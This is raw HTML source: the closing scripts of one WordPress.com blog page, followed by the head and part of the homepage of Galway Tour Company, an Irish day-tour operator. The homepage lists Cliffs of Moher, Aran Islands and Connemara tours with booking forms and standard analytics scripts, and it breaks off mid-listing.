src='https://s1.wp.com/_static/??-eJyVUNEOwjAI/CErajT6YvyW2qFSO1oL3fTv7Uy2GB+W+HbA3XEAfTIusiIreIEGO3KYnksvC/gatcWkUK7EAoHuKPAoWPBmuQmYZ8jEF2LS1wRmuLZpic3ZZmitKOaKTOwwZ2rqwqn3p4Nm6+4yJ3JKkQfRhGbYzuZYBAN41FSdzdgYNcQulCFw/ab0l3j26PTXcHTr6mkRrAjqR/CpU0YZAp/a43q322/Xh8Nq499P3Z/I'></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=20111117'></script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyVy0sOQEAMANALqcZnluIsmGbSUTUZRdyerZVYvsXDM8G0qpEaLjsk2QPrhnayGWUYZZjmkbOHxIRKB2VSzxrKuBX456bvx0IewiBC+XrrWf3SVc61deOquo03DQdDyw=='></script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","postmessage","mobile-useragent-info","jquery_inview","jetpack_resize","tortuga-jquery-navigation","spin","jquery.spin","grofiles-cards","wpgroho","jquery.autoresize","highlander-comments","devicepx","jetpack_likes_queuehandler","the-neverending-homepage","wpcom-masterbar-js","wpcom-masterbar-tracks-js","wpcom-actionbar-bar","jetpack-carousel","swfobject","videopress","twitter-widgets","twitter-widgets-infinity","twitter-widgets-pending","tiled-gallery"] ); jQuery.extend( infiniteScroll.settings.styles, ["wpcom-smileys","jetpack_likes","the-neverending-homepage","wp-block-library","wpcom-core-compat-playlist-styles","mp6hacks","wpcom-bbpress2-staff-css","tortuga-stylesheet","genericons","noticons","geo-location-flair","reblogging","wpcom-actionbar-bar","h4-global","tortuga-default-fonts","highlander-comments","highlander-comments-ie7","jetpack-carousel","tiled-gallery"] ); </script><script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'149995575','blog_tz':'-4','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'149995575','v':'wpcom','tz':'-4','user_id':'0','subd':'twosevenproductions'}]); _stq.push(['extra', {'crypt':'UE40eW5QN0p8M2Y/RE1TaVhzUzFMbjdWNHpwZGhTayxPSUFCMGNrd29+Smw0TDhnZmRTK0hlRi9QSGh6bi9GXVhBJWIlZlR5U1JMLU8/MkNtblkvY1dzWkZHMElNcXlRRzFBQVtTMHZXfj81LT9oZCw9NSs/Y2h0fHAyVkxaeWhCZi13QURvR0FkLjVxfE4xMndjYjhMa0V4K2ozLVZHM3JwVms9UC5Fbk81SmYuWk1GeWcydXJlJmVOczJ0NkMyTVBUMHczN1tCcHpCRm5MNmJPaWt4a2FDNURXJV0mOCtWRGFoTlEyejVmc2FWajdVdWc2WGFmWDUvTD8lVw=='}]); _stq.push([ 'clickTrackerInit', '149995575', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script> </body> </html>
0
<!doctype html> <!--[if lt IE 7 ]><html class="ie ie6" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9 ]><html class="ie ie9" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if (gte IE 10)|!(IE)]><!--><html lang="en-GB" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="UTF-8"> <!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]--> <title>Aran Islands, Cliffs of Moher &amp; Connemara with Galway Tour Company</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://www.galwaytourcompany.com/xmlrpc.php"> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- Mobile Specific Metas ================================================== --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <!-- Favicons ================================================== --> <link rel="shortcut icon" href="http://www.galwaytourcompany.com/wp-content/themes/tours/images/favicon.ico"> <link rel="apple-touch-icon" href="http://www.galwaytourcompany.com/wp-content/themes/tours/images/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="http://www.galwaytourcompany.com/wp-content/themes/tours/images/apple-touch-icon-72x72.png" /> <link rel="apple-touch-icon" sizes="114x114" href="http://www.galwaytourcompany.com/wp-content/themes/tours/images/apple-touch-icon-114x114.png" /> <link href='http://fonts.googleapis.com/css?family=Roboto:400,300,700,500' rel='stylesheet' type='text/css'> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Galway Tour Company offers creative and fun Day Tours departing Galway daily to the most popular sites such as the Cliffs of Moher, Connemara &amp; Aran Islands"/> <link rel="canonical" href="http://www.galwaytourcompany.com/" /> <meta property="og:locale" content="en_GB" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Aran Islands, Cliffs of Moher &amp; Connemara with Galway Tour Company" /> <meta property="og:description" content="Galway Tour Company offers creative and fun Day Tours departing Galway daily to the most popular sites such as the Cliffs of Moher, Connemara &amp; Aran Islands" /> <meta property="og:url" content="http://www.galwaytourcompany.com/" /> <meta property="og:site_name" content="Galway Tour Company" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Galway Tour Company offers creative and fun Day Tours departing Galway daily to the most popular sites such as the Cliffs of Moher, Connemara &amp; Aran Islands" /> <meta name="twitter:title" content="Aran Islands, Cliffs of Moher &amp; Connemara with Galway Tour Company" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://www.galwaytourcompany.com/#organization","name":"","url":"http://www.galwaytourcompany.com/","sameAs":[]},{"@type":"WebSite","@id":"http://www.galwaytourcompany.com/#website","url":"http://www.galwaytourcompany.com/","name":"Galway Tour Company","publisher":{"@id":"http://www.galwaytourcompany.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"http://www.galwaytourcompany.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"http://www.galwaytourcompany.com/#webpage","url":"http://www.galwaytourcompany.com/","inLanguage":"en-GB","name":"Aran Islands, Cliffs of Moher &amp; Connemara with Galway Tour Company","isPartOf":{"@id":"http://www.galwaytourcompany.com/#website"},"about":{"@id":"http://www.galwaytourcompany.com/#organization"},"datePublished":"2015-04-14T14:40:54+00:00","dateModified":"2018-03-14T22:08:01+00:00","description":"Galway Tour Company offers creative and fun Day Tours departing Galway daily to the most popular sites such as the Cliffs of Moher, Connemara & Aran Islands"}]}</script> <!-- / Yoast SEO plugin. --> <script type='text/javascript'>console.log('PixelYourSite Free version 7.0.4');</script> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//w.sharethis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-10367565-3'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-10367565-3', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.galwaytourcompany.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.galwaytourcompany.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://www.galwaytourcompany.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-lightbox-swipebox-css' href='http://www.galwaytourcompany.com/wp-content/plugins/responsive-lightbox/assets/swipebox/css/swipebox.min.css?ver=2.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='ce_responsive-css' href='http://www.galwaytourcompany.com/wp-content/plugins/simple-embed-code/css/video-container.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='insp-css' href='http://www.galwaytourcompany.com/wp-content/themes/tours/style.css?ver=5.2' type='text/css' media='screen, projection' /> <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"http:\/\/www.galwaytourcompany.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/responsive-lightbox/assets/swipebox/js/jquery.swipebox.min.js?ver=2.1.0'></script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var rlArgs = {"script":"swipebox","selector":"lightbox","customEvents":"","activeGalleries":"1","animation":"1","hideCloseButtonOnMobile":"0","removeBarsOnMobile":"0","hideBars":"1","hideBarsDelay":"5000","videoMaxWidth":"1080","useSVG":"1","loopAtEnd":"0","woocommerce_gallery":"0","ajaxurl":"https:\/\/www.galwaytourcompany.com\/wp-admin\/admin-ajax.php","nonce":"54fa539f12"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.1.0'></script> <script id='st_insights_js' type='text/javascript' src='http://w.sharethis.com/button/st_insights.js?publisher=eba0f3ba-f9ab-408c-bc68-c28af5afe749&#038;product=feather'></script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var pysOptions = {"staticEvents":{"facebook":{"PageView":[{"params":[],"delay":0,"ids":[]}],"GeneralEvent":[{"params":{"post_type":"page","post_id":"2","content_name":"Home"},"delay":0,"ids":[]}]}},"facebook":{"pixelIds":["111386426221556"],"advancedMatching":[],"removeMetadata":false,"contentParams":{"post_type":"page","post_id":2,"content_name":"Home"},"commentEventEnabled":true,"wooVariableAsSimple":false,"downloadEnabled":true,"formEventEnabled":true},"debug":"","siteUrl":"http:\/\/www.galwaytourcompany.com","ajaxUrl":"https:\/\/www.galwaytourcompany.com\/wp-admin\/admin-ajax.php","commonEventParams":{"domain":"www.galwaytourcompany.com","user_roles":"guest","plugin":"PixelYourSite"},"commentEventEnabled":"1","downloadEventEnabled":"1","downloadExtensions":["doc","exe","js","pdf","ppt","tgz","zip","xls"],"formEventEnabled":"1","gdpr":{"ajax_enabled":false,"all_disabled_by_api":false,"facebook_disabled_by_api":false,"analytics_disabled_by_api":false,"google_ads_disabled_by_api":false,"pinterest_disabled_by_api":false,"facebook_prior_consent_enabled":false,"analytics_prior_consent_enabled":true,"google_ads_prior_consent_enabled":null,"pinterest_prior_consent_enabled":true,"cookiebot_integration_enabled":false,"cookiebot_facebook_consent_category":"marketing","cookiebot_analytics_consent_category":"statistics","cookiebot_google_ads_consent_category":null,"cookiebot_pinterest_consent_category":"marketing","ginger_integration_enabled":false,"cookie_notice_integration_enabled":false,"cookie_law_info_integration_enabled":false},"woo":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true,"removeFromCartSelector":".cart .product-remove .remove"},"edd":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.galwaytourcompany.com/wp-content/plugins/pixelyoursite/dist/scripts/public.js?ver=7.0.4'></script> <link rel='https://api.w.org/' href='http://www.galwaytourcompany.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.galwaytourcompany.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.galwaytourcompany.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='http://www.galwaytourcompany.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.galwaytourcompany.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.galwaytourcompany.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.galwaytourcompany.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.galwaytourcompany.com%2F&#038;format=xml" /> <style type="text/css"></style> <style type="text/css"> .synved-social-resolution-single { display: inline-block; } .synved-social-resolution-normal { display: inline-block; } .synved-social-resolution-hidef { display: none; } @media only screen and (min--moz-device-pixel-ratio: 2), only screen and (-o-min-device-pixel-ratio: 2/1), only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (min-device-pixel-ratio: 2), only screen and (min-resolution: 2dppx), only screen and (min-resolution: 192dpi) { .synved-social-resolution-normal { display: none; } .synved-social-resolution-hidef { display: inline-block; } } </style> <link rel="icon" href="http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway_Tour_Photo_Kinvara_01-150x150.jpg" sizes="32x32" /> <link rel="icon" href="http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway_Tour_Photo_Kinvara_01-270x270.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway_Tour_Photo_Kinvara_01-270x270.jpg" /> <meta name="msapplication-TileImage" content="http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway_Tour_Photo_Kinvara_01-270x270.jpg" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ </style> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-10367565-3', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-tpl_homepage page-template-tpl_homepage-php page page-id-2"> <div class="band headerbg"> <div class="container"> <div class="header"> <div class="row"> <div class="span4 logo"> <a href="http://www.galwaytourcompany.com/" title="Galway Tour Company"><img src="//www.galwaytourcompany.com/wp-content/uploads/2017/02/gtc-logo.png" alt="Galway Tour Company" title="Galway Tour Company" /></a> </div> <div class="span8"> <nav class="nav"><ul class="nav-list"><li id="menu-item-59" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59"><a href="/tour/">Day Tours</a></li> <li id="menu-item-31" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a href="http://www.galwaytourcompany.com/extended-tours/">Extended Tours</a></li> <li id="menu-item-32" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32"><a href="http://www.galwaytourcompany.com/coach-hire/">Coach Hire</a></li> <li id="menu-item-35" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35"><a href="http://www.galwaytourcompany.com/contact-us/">Contact Us</a></li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://www.galwaytourcompany.com/useful-links/">Useful Links</a></li> <li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-34"><a href="http://www.galwaytourcompany.com/about-us/">About Us</a></li> </ul></nav> </div> </div> </div> </div> </div> <div class="band slider row"> <div class="owl-carousel"> <div class="slidediv" style="background-image:url('http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway-Tour-Company.jpg');"> <div class="container"> <div class="row"> <div class="span12"> <div class='slider-content'> <div><h1></h1></div> <h1></h1> </div> </div> </div> </div> </div> <div class="slidediv" style="background-image:url('http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway-Tour-Company2.jpg');"> <div class="container"> <div class="row"> <div class="span12"> <div class='slider-content'> <div><h1></h1></div> <h1></h1> </div> </div> </div> </div> </div> <div class="slidediv" style="background-image:url('http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway-Tour-Company3.jpg');"> <div class="container"> <div class="row"> <div class="span12"> <div class='slider-content'> <div><h1></h1></div> <h1></h1> </div> </div> </div> </div> </div> <div class="slidediv" style="background-image:url('http://www.galwaytourcompany.com/wp-content/uploads/2017/01/Galway-Tour-Company4.jpg');"> <div class="container"> <div class="row"> <div class="span12"> <div class='slider-content'> <div><h1></h1></div> <h1></h1> </div> </div> </div> </div> </div> </div> </div> <div class="band lightgrey"> <div class="whitepadd"> <div class="container paddbot"> <div class="bannerContainer"> <a href="//www.dublintourcompany.com/" alt="Dublin Tour Company"><img src="//www.galwaytourcompany.com/wp-content/uploads/2018/03/dtc.jpg" class="bannerDTC" alt="Dublin Tour Company"/></a> </div> <div class="row"> <div class="span6"> <h2>Featured Tours</h2> <hr class="sm"> </div> <div class="span6 txtright"> <a href="http://www.galwaytourcompany.com/tour/" title="View all Tours" class="btn blu">View All Tours &raquo;</a> </div> </div> <div class="row"> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/aran-islands-cliffs-cruise/" title="Permalink to The Aran Islands &#038; The Cliffs Cruise" rel="bookmark">The Aran Islands &#038; The Cliffs Cruise</a></h3> <a href="http://www.galwaytourcompany.com/tour/aran-islands-cliffs-cruise/" title="Permalink to The Aran Islands &#038; The Cliffs Cruise" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-Spring-lambs1-e1485783604487-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="" /> </a> <div class="mh"><p>Join Aran Tour Company to visit The Aran Islands and see the Cliffs of Moher like never before. With The Aran Islands, Cliffs of Moher &#038; The Cliffs Cruise all in a day! </p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/aran-islands-cliffs-cruise/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="38"> <input type="submit" class="booknow" id="button1" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/1000-cliffs-moher-tour/" title="Permalink to Cliffs of Moher &#038; The Burren" rel="bookmark">Cliffs of Moher &#038; The Burren</a></h3> <a href="http://www.galwaytourcompany.com/tour/1000-cliffs-moher-tour/" title="Permalink to Cliffs of Moher &#038; The Burren" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-090814CH233-2-e1485782689441-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="Cliffs of Moher 1 Day Tour" /> </a> <div class="mh"><p>Cliffs of Moher &#8211; Ireland&#8217;s No. 1 Tourist Attraction- recently appeared in Harry Potter&#8217;s Half-Blood Prince and of course the movie classic The Princess Bride! This tour is a MUST for any visitor to Ireland.</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/1000-cliffs-moher-tour/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="1"> <input type="submit" class="booknow" id="button2" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/connemara-cong-tour/" title="Permalink to Connemara, Cong &#038; Kylemore Abbey" rel="bookmark">Connemara, Cong &#038; Kylemore Abbey</a></h3> <a href="http://www.galwaytourcompany.com/tour/connemara-cong-tour/" title="Permalink to Connemara, Cong &#038; Kylemore Abbey" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-Kylemore-Abbey-01-e1485782588188-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="Connemara &amp; Cong 1 Day tour" /> </a> <div class="mh"><p>For the hidden Ireland off the main tourist track this tour is a must. A truly magical day out in typical Irish countryside- let us bring it to life and inform you of the many legends from killer sheep to lake monsters!</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/connemara-cong-tour/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="2"> <input type="submit" class="booknow" id="button3" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/1100-express-cliffs-moher/" title="Permalink to Cliffs of Moher Express &#038; 3 Hour Stop" rel="bookmark">Cliffs of Moher Express &#038; 3 Hour Stop</a></h3> <a href="http://www.galwaytourcompany.com/tour/1100-express-cliffs-moher/" title="Permalink to Cliffs of Moher Express &#038; 3 Hour Stop" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-1003515.jpg-e1485782905210-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="ABC Tour Offer! (2 nights.)" /> </a> <div class="mh"><p>Your Cliffs of Moher Express Service is the quickest way to get from Galway City direct to the world famous Cliffs of Moher! 3 Hour Stop on The Cliffs of Moher. Direct service from Galway. We can&#8217;t make it any easier! </p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/1100-express-cliffs-moher/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="37"> <input type="submit" class="booknow" id="button4" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/galway-overnight-offer/" title="Permalink to Galway Overnight Tour Offer" rel="bookmark">Galway Overnight Tour Offer</a></h3> <a href="http://www.galwaytourcompany.com/tour/galway-overnight-offer/" title="Permalink to Galway Overnight Tour Offer" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-ch_jan07_112-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="Galway Overnight Offer" /> </a> <div class="mh"><p>The Galway Tour Company&#8217;s Overnight Offer is a combination of our 2 flagship tours, Cliffs of Moher &#038; The Burren + Connemara &#038; Cong combined with a return Dublin &#8211; Galway Transfer</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/galway-overnight-offer/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="28"> <input type="submit" class="booknow" id="button5" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/abc-tour/" title="Permalink to ABC Tour 1 Ticket, 2 Nights, 3 Trips" rel="bookmark">ABC Tour 1 Ticket, 2 Nights, 3 Trips</a></h3> <a href="http://www.galwaytourcompany.com/tour/abc-tour/" title="Permalink to ABC Tour 1 Ticket, 2 Nights, 3 Trips" rel="bookmark"> <img width="470" height="250" src="http://www.galwaytourcompany.com/wp-content/uploads/2015/04/medium-1003515.jpg-e1485782905210-470x250.jpg" class="attachment-newsthumb size-newsthumb wp-post-image" alt="ABC Tour Offer! (2 nights.)" /> </a> <div class="mh"><p>The Galway Tour Company’s ABC Tour Offer with hostel accommodation combines Ireland’s Top 3 Tourist Attractions into one ticket- as simple as ABC- Aran Islands, Burren (Cliffs of Moher) &#038; Connemara and Cong!</p> </div> <form action="https://www.galwaytourcompany.com/gtc/book1.jsp" method="post"> <a href="http://www.galwaytourcompany.com/tour/abc-tour/" title="More info" class="moredetails">More details &raquo;</a> <input name="AddBookProductId" type="hidden" value="40"> <input type="submit" class="booknow" id="button6" value="Book Now &raquo;"> </form> </div> <div class="span3"> <h3><a href="http://www.galwaytourcompany.com/tour/aran-islands-service-ferryshuttle-bus/" title="Permalink to Aran Islands Service (Ferry/Shuttle Bus)" 